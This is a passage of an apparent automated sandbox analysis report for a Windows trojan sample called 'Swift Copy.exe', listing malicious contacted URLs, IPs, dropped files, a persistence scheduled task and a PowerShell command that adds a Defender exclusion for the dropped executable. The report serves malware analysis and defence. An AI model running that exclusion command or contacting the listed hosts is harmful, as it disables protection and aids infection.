          http://www.blackyaga.xyz/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA==100%Avira URL Cloudmalware
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.epic45.co.uk
          		103.67.235.120
          		truetrue
            		unknown
            www.posinet1.com
            		202.172.26.50
            		truefalse
              		unknown
              kinemartigues.com
              		51.159.175.169
              		truetrueunknown
              www.expectedclosure.one
              		192.3.130.2
              		truetrue
                		unknown
                mogdento.com
                		103.92.235.55
                		truetrue
                  		unknown
                  natroredirect.natrocdn.com
                  		85.159.66.93
                  		truetrue
                    		unknown
                    www.mogdento.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.kinemartigues.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.blackyaga.xyz
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.epic45.co.uk/bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.kinemartigues.com/bwe0/true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.epic45.co.uk/bwe0/true
                          • Avira URL Cloud: malware
                          		unknown
                          www.my1245.com/bwe0/true
                          • Avira URL Cloud: malware
                          		low
                          http://www.mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w==true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA==true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.mogdento.com/bwe0/true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.blackyaga.xyz/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA==true
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.apache.org/licenses/LICENSE-2.0Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.comSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designersGSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://philiphanson.org/medius/book/1.0Swift Copy.exe, ImUIYlbLTIh.exe.0.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.micr$explorer.exe, 0000000B.00000000.339382801.00000000061ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.323818744.00000000061ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.389826737.00000000061ED000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		low
                                http://www.fontbureau.com/designers/?Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bTheSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers?Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&amp;9rV8zl=M79ygOKZBNETSTAT.EXE, 00000019.00000002.518409409.000000000379E000.00000004.10000000.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.tiro.comSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designersSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.goodfont.co.krSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9NETSTAT.EXE, 00000019.00000002.518477134.0000000003996000.00000004.10000000.00040000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.carterandcone.comlSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.sajatypeworks.comSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.typography.netDSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.founder.com.cn/cn/cTheSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/staff/dennis.htmSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://fontfabrik.comSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.founder.com.cn/cnSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/frere-jones.htmlSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.jiyu-kobo.co.jp/Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZBNETSTAT.EXE, 00000019.00000002.518409409.000000000379E000.00000004.10000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.galapagosdesign.com/DPleaseSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers8Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fonts.comSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.sandoll.co.krSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.urwpp.deDPleaseSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.zhongyicts.com.cnSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSwift Copy.exe, 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.sakkal.comSwift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                103.92.235.55
                                                		mogdento.comIndia
                                                		138251ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdINtrue
                                                103.67.235.120
                                                		www.epic45.co.ukPhilippines
                                                		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
                                                192.3.130.2
                                                		www.expectedclosure.oneUnited States
                                                		36352AS-COLOCROSSINGUStrue
                                                85.159.66.93
                                                		natroredirect.natrocdn.comTurkey
                                                		34619CIZGITRtrue
                                                51.159.175.169
                                                		kinemartigues.comFrance
                                                		12876OnlineSASFRtrue

                                                General Information

                                                Joe Sandbox Version:35.0.0 Citrine
                                                Analysis ID:682145
                                                Start date and time:2022-08-11 06:27:06 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 8m 52s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:Swift Copy.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:34
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@11/9@6/5
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 89.5% (good quality ratio 78.3%)
                                                • Quality average: 72%
                                                • Quality standard deviation: 33.1%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Adjust boot time
                                                • Enable AMSI

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                • TCP Packets have been reduced to 100
                                                • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86
                                                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                06:28:14API Interceptor1x Sleep call for process: Swift Copy.exe modified
                                                06:28:22API Interceptor44x Sleep call for process: powershell.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASNs

                                                No context

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Swift Copy.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\Swift Copy.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):1308
                                                Entropy (8bit):5.345811588615766
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):22240
                                                Entropy (8bit):5.6028719789255295
                                                Encrypted:false
                                                SSDEEP:384:BjtCDLq0wase0vaYS0nkjultIti7Y9gNSJ3xS1BMrmLZ1AV7t/JQ64I+iaY:BOeTTkCltS2NcRa4uo
                                                MD5:7A7867EA62542FC6B21D374EB056D454
                                                SHA1:C5683AEABF7D5E9DFD8DCA8FCD2EBBFC07F5E935
                                                SHA-256:620940C797B65CD49D883B943193907DA9E16C40473F957D80137136442155A5
                                                SHA-512:2EB8C8BA5F3609F1F9BBD690664000C21519B33098150E55BD15F47A50503F96F8C2F13481F271D29F94D36667E2AAFDADB27B774FFE9FF33897053BEE1AD4FE
                                                Malicious:false
                                                Preview:@...e...........p...................A.X..............@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                C:\Users\user\AppData\Local\Temp\77824-68

                                                Download File
                                                Process:C:\Windows\SysWOW64\NETSTAT.EXE
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.792852251086831
                                                Encrypted:false
                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rlnywwb4.hev.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y1crm10v.d0k.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1

                                                C:\Users\user\AppData\Local\Temp\tmpE16E.tmp

                                                Download File
                                                Process:C:\Users\user\Desktop\Swift Copy.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1598
                                                Entropy (8bit):5.150122293480084
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtcxvn:cge4MYrFdOFzOzN33ODOiDdKrsuTcv
                                                MD5:7ADFF2CBF1E01AF88D3EED7E905CCA35
                                                SHA1:39CA78F7F44C9777C94C7EE8C0C3DE2439E38E49
                                                SHA-256:7E1B747AB5522CC5F787C2C0D1CDFD309A83F2172C57E3C71CFC7DACE57D9B22
                                                SHA-512:7BA1CD52047EB744B81F34089B8FE44B74F8416ADD6F32F89A5F4677C4FCFE1CD8D1547DC6A2E235FAE6C09E37A875C3CB10D3CB1703340F42EF1CD3520C012C
                                                Malicious:true
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <

                                                C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\Swift Copy.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):951808
                                                Entropy (8bit):7.296393499688903
                                                Encrypted:false
                                                SSDEEP:12288:V5RNKS2+vpc++24ATV3l7DnJE8Y9FFyUaOzNsC7qZJSPlestx70M2TgN/0seI+r:z1jpSwTFJq79FFyrW6Cs+tJegiDr
                                                MD5:50D4FB3F5A33007C2F80E5BBAA5E0CCD
                                                SHA1:26FF500D90184B5E7928CB16E92BBE0E4553E95E
                                                SHA-256:0BACCE1F09D476C0B84CD699B50152A74DD6BFD2A052749D7B5A3F4A4AE7B7D9
                                                SHA-512:D6E46C5187CE7AD3021E22937AB20207672BDBD936473A56C78FBA26BDC20ADA47B3F1C21B6058A4941965A60FE37A18CBEF95A19BA9A216F4FE726F1929F7EF
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 20%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.b.................r..........n.... ........@.. ....................................@.....................................W.................................................................................... ............... ..H............text...tp... ...r.................. ..`.rsrc................t..............@..@.reloc..............................@..B................P.......H....... ...................:..........................................z.(".....}.....(#...o$...}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....o....*..{....*.s%.

                                                C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe:Zone.Identifier

                                                Download File
                                                Process:C:\Users\user\Desktop\Swift Copy.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:false
                                                Preview:[ZoneTransfer]....ZoneId=0

                                                C:\Users\user\Documents\20220811\PowerShell_transcript.562258.BHPHpPz5.20220811062819.txt

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):5793
                                                Entropy (8bit):5.414413496960812
                                                Encrypted:false
                                                SSDEEP:96:BZ6h4NbqDo1ZQZrh4NbqDo1Z7/ExEHEjZMh4NbqDo1Z4cEXEXEvbZti:rYEiWWD
                                                MD5:D946F9E80DA250A03428805266BA205D
                                                SHA1:E3E581F2D54CA949141B2F6B4632B40D659229A4
                                                SHA-256:2FE88921A87252CCC07C1A2C128417E75CFC5D412E15D82F759ABDDB00E46F65
                                                SHA-512:719B1FD781969903B541452DA310AE4B3C716F35838DF31AA38CA95A259A5F57877A1C2B190704518376D120AEC2B868DB340177672BF82330F2D116C5580043
                                                Malicious:false
                                                Preview:.**********************..Windows PowerShell transcript start..Start time: 20220811062822..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 562258 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe..Process ID: 2300..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220811062822..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe..**********************..Windows PowerShell transcript start..Start time: 20220811063226..Username: computer\user..RunAs User: computer\ha

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.296393499688903
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:Swift Copy.exe
                                                File size:951808
                                                MD5:50d4fb3f5a33007c2f80e5bbaa5e0ccd
                                                SHA1:26ff500d90184b5e7928cb16e92bbe0e4553e95e
                                                SHA256:0bacce1f09d476c0b84cd699b50152a74dd6bfd2a052749d7b5a3f4a4ae7b7d9
                                                SHA512:d6e46c5187ce7ad3021e22937ab20207672bdbd936473a56c78fba26bdc20ada47b3f1c21b6058a4941965a60fe37a18cbef95a19ba9a216f4fe726f1929f7ef
                                                SSDEEP:12288:V5RNKS2+vpc++24ATV3l7DnJE8Y9FFyUaOzNsC7qZJSPlestx70M2TgN/0seI+r:z1jpSwTFJq79FFyrW6Cs+tJegiDr
                                                TLSH:6815AEEEBA88C45BCF244670F84955F52B66ECE1F021D9AFA893BC31F17229E1117D06
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.b.................r..........n.... ........@.. ....................................@................................

                                                File Icon

                                                Icon Hash:00684068688eb200

                                                Static PE Info

                                                General

                                                Entrypoint:0x4d906e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x62F46401 [Thu Aug 11 02:05:53 2022 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
